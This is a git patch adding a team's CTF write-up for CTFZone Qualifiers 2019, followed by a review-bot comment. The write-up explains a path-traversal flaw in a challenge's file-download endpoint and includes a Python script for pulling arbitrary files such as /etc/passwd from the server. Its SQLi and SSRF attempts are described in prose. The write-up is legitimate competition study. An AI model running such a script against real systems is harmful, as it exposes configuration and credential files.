From f463353a0597d7c7cc57fe61f73692747d7dc277 Mon Sep 17 00:00:00 2001 From: Patric Gruber Date: Wed, 18 Dec 2019 11:42:57 +0100 Subject: [PATCH] add theguy/ctfzonequals19.md writeup --- writeups/theguy/ctfzonequals19.md | 115 ++++++++++++++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 writeups/theguy/ctfzonequals19.md diff --git a/writeups/theguy/ctfzonequals19.md b/writeups/theguy/ctfzonequals19.md new file mode 100644 index 0000000..4f96286 --- /dev/null +++ b/writeups/theguy/ctfzonequals19.md 
@@ -0,0 +1,115 @@ +# CTFZone Qualifiers 2019 +## Retrospective +This CTF was quite frustrating because it felt more like guess-work than anything else. +At least the web challenges were kinda strange. + +## Challenges +### Chicken (Web) +This challenge presented you a website that proudly presents a chicken farm and award-winning chickens. +It showed photos and provided passports that contained the chicken's properties as downloadable file. + +The first vulnerability was quite easy to spot. The url for the passports to download looked something like this: `web-chicken.ctfz.one/File/Download?filename=My50eHQ=` +As you can see quite easily the GET parameter `filename` contained a base64 encoded filename. +It was possible to do a path traversal. There was no sanitization on the value of `filename` what so ever. + +This vulnerability was found about 3 minutes in. In the next few hours the real challenge began. What to retrieve from the server? + +The HTTP-Response from the server contained a header that hinted to "openresty" webserver which is just nginx with LUA support. But the error page when trying to open a non existent file, showed a ASP.NET core error message. + +I tried to download any nginx files, but no luck, because it was not a nginx webserver or just a containerized one. + +So going after the hint of the Asp.NET core service we tried to get interesting files of the service. + +By extensive googeling and some clever fuuzzing from @lavish we found quite some files. +The following is the complete file tree that we found: + +``` +/ + etc + passwd + ??? 
+ Passports + 1.txt + 2.txt + 3.txt + 4.txt + 5.txt + wwwroot + css + site.min.css + js + site.min.js + images + hens + 1.jpg + 2.jpg + 3.jpg + 4.jpg + 5.jpg + Views + Auth + Login.cshtml + Home + Hens.cshtml + Shared + _Layout.cshtml + _CookieConsentPartial.cshtml + Error.cshtml + _ViewImports.cshtml + appsettings.json +``` +The python script I wrote and used to retrieve the files is the following: + +``` +#!/usr/bin/python + +import requests +import base64 + +s = requests.session() +url = "http://web-chicken.ctfz.one/File/Download?filename={}" + +def get_file(filename): + enc = base64.b64encode(filename.encode()).decode() + return s.get(url.format(enc)).text + +if __name__=='__main__': + while True: + content = get_file(input("Path: ")) + print("Content: ",end="") + if "

An error occurred while processing your request.

" in content: + print("Nope") + else: + print() + print(content) + print() +``` +The challenge was written using C# and was a MVC project. +We couldn't retrieve any `.cs` files. There probably was a filter in place. + +Getting to this point already took several hours and then I had to leave afterwards. + +### Bathhouse (Web) +During the CTF I also briefly looked thorugh some other challenges. +One of those was "Bathhouse". + +The challenge description hinted towards being able to make an appointment. +The website was about baths that you can book for a certain date and time. There was a web form that included several input fields that you have to provide. + +I provided some fake information and clicked on the submit button in the believe that there will be some kind of error or warning. But I was greeted by a "Booking successful" message and was greatly confused. I tried some very basic SQLi stuff, but I didn't get anything from it and just left the challenge alone. + +### Mememology (OSINT) +I also looked through this challenge, but at the time of me deciding to look into it it was already nearly solved. I just provided an idea for the last part of the challenge namly the "video part" and the challenge was solved. @matthias did all the work. + +### Zirconium (Web) +This challenge consisted of a webapplication that provided a malware scanner for files. You could upload a file or provide a link where it could be downloaded. +The scanned files could then be downloaded from the website again. + +For me the whole set up screamed SSRF to a local file. I tried providing a webhook link, which worked fine and told me that the used library for the file request was `Python-urllib/3.4` through the request headers. + +You could only provide an url that starts with `http://` and `https://` so simply using `file://` or `local_file://` wasn't going to work. + +I remembered the presentation of Orange Tsai about SSRF and URL parsers called "A new Era of SSRF". 
I tried several strategies from that presentation. +These tricks didn't work also they weren't that useful since the protocol was fixed. + +After that I remembered a challenge that also used nginx and had a SSRF vulnerability which was filtered for nearly everything. I looked it up in the corresponding mattermost channel. It was the challenge `web-Option-Cmd-U` from the CTF `SECCON 2019`. The trick using `http://nginx/...` also didn't work or at least I wasn't good enough at fuzzing the correct file name. \ No newline at end of file -- 2.43.0
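Review bot: the error check in the Python script, `if "` ... `" in content:`, spans several lines inside a plain double-quoted literal, so the file will not parse as committed; put the marker on one line, e.g. `ERROR_MARKER = "An error occurred while processing your request."` followed by `if ERROR_MARKER in content:`, matching a substring of the error page rather than the exact surrounding whitespace. Two smaller points in the same hunk: the shebang `#!/usr/bin/python` resolves to whatever `python` is on the host, but `input()` and `print("Content: ", end="")` are Python 3 code, so `#!/usr/bin/env python3` is the safer choice; and both fenced blocks open with a bare ``` so the script gets no highlighting, tag that block as ```python. The prose has a few typos worth fixing before merge: "googeling", "fuuzzing", "thorugh", "namly", "what so ever" (whatsoever), "in the believe" (belief), "a ASP.NET core" (an ASP.NET Core), "LUA" (Lua), and the file should end with a trailing newline.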